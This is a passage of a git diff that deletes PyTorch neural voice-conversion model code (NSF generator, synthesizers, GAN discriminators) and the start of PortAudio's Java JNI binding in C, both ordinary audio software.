- xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def 
_f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - 
initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMs256NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates 
= upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - nsff0 = nsff0[:, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs768NSFsid(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = 
gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward( - self, phone, phone_lengths, pitch, pitchf, y, y_lengths, ds - ): # 这里ds是id,[bs,1] - # print(1,pitch.shape)#[bs,t] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - # print(-1,pitchf.shape,ids_slice,self.segment_size,self.hop_length,self.segment_size//self.hop_length) - pitchf = commons.slice_segments2(pitchf, ids_slice, self.segment_size) - # print(-2,pitchf.shape,z_slice.shape) - o = self.dec(z_slice, pitchf, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, pitch, nsff0, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - nsff0 = nsff0[:, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, nsff0, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs256NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - 
f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs768NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, 
"self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = 
l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c b/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c deleted file mode 100644 index 77c42eba851c46dbddf6cbdfa2f2aa12c1782c6b..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c +++ /dev/null @@ -1,279 +0,0 @@ -/* - * Portable Audio I/O Library - * Java Binding for PortAudio - * - * Based on the Open Source API proposed by Ross Bencina - * Copyright (c) 2008 Ross Bencina - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
- */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. - */ - -#include "com_portaudio_PortAudio.h" -#include "portaudio.h" -#include "jpa_tools.h" - -/* - * Class: com_portaudio_PortAudio - * Method: getVersion - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getVersion - (JNIEnv *env, jclass clazz) -{ - return Pa_GetVersion(); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getVersionText - * Signature: ()Ljava/lang/String; - */ -JNIEXPORT jstring JNICALL Java_com_portaudio_PortAudio_getVersionText - (JNIEnv *env, jclass clazz) -{ - return (*env)->NewStringUTF(env, Pa_GetVersionText() ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: initialize - * Signature: ()I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_initialize - (JNIEnv *env, jclass clazz) -{ - PaError err = Pa_Initialize(); - jpa_CheckError( env, err ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: terminate - * Signature: ()I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_terminate - (JNIEnv *env, jclass clazz) -{ - PaError err = Pa_Terminate(); - jpa_CheckError( env, err ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDeviceCount - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDeviceCount - (JNIEnv *env, jclass clazz) -{ - jint count = Pa_GetDeviceCount(); - return jpa_CheckError( env, count ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDeviceInfo - * Signature: (ILcom/portaudio/DeviceInfo;)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_getDeviceInfo - (JNIEnv *env, jclass clazz, jint index, jobject deviceInfo) -{ - const PaDeviceInfo *info; - /* Get a reference to obj's class */ - jclass cls = (*env)->GetObjectClass(env, deviceInfo); - - info = Pa_GetDeviceInfo( index ); - if( info == NULL ) - { - jpa_ThrowError( env, "Pa_GetDeviceInfo returned NULL." 
); - } - else - { - jpa_SetStringField( env, cls, deviceInfo, "name", info->name ); - jpa_SetIntField( env, cls, deviceInfo, "maxInputChannels", info->maxInputChannels ); - jpa_SetIntField( env, cls, deviceInfo, "maxOutputChannels", info->maxOutputChannels ); - jpa_SetIntField( env, cls, deviceInfo, "hostApi", info->hostApi ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultSampleRate", info->defaultSampleRate ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowInputLatency", info->defaultLowInputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowInputLatency", info->defaultHighInputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowOutputLatency", info->defaultLowOutputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultHighOutputLatency", info->defaultHighOutputLatency ); - } -} - -/* - * Class: com_portaudio_PortAudio - * Method: geHostApiCount - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getHostApiCount - (JNIEnv *env, jclass clazz) -{ - jint count = Pa_GetHostApiCount(); - return jpa_CheckError( env, count ); -} - - -/* - * Class: com_portaudio_PortAudio - * Method: hostApiTypeIdToHostApiIndex - * Signature: (I)I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_hostApiTypeIdToHostApiIndex - (JNIEnv *env, jclass clazz, jint hostApiType) -{ - return Pa_HostApiTypeIdToHostApiIndex( (PaHostApiTypeId) hostApiType ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: hostApiDeviceIndexToDeviceIndex - * Signature: (II)I - */ -JNIEXPORT jint 